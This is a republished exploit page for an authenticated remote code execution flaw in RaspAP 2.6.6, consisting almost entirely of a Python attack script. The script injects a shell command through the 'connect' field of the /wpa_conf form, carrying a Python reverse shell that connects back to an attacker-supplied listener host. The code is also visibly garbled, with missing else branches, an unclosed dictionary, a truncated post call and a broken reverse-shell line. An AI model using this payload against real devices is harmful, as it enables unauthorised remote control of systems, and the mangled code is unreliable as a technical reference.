RaspAP 2.6.6 Remote Code Execution

Our sensors found this exploit at:

Below is a copy:

RaspAP 2.6.6 Remote Code Execution
# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <[email protected]>
# Vendor Homepage:
# Software Link:
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re

if len(sys.argv) != 7:
    print("python3 <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    username = sys.argv[3]
    password = sys.argv[4]
    listener_host = sys.argv[5]
    listener_port = sys.argv[6]

    endpoint = "/wpa_conf"
    exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'"
    url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

    s = requests.Session()

    get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
    soup = BeautifulSoup(get_Request.text, "lxml")
    csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
    post_data = {
        "csrf_token": csrf_token,
        "connect": "wlan; {}".format(exploit)
    post_Request =, data=post_data, auth=HTTPBasicAuth(username, password))
    if post_Request.status_code:
        print("Exploit send.")
        print("Something went wrong.")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.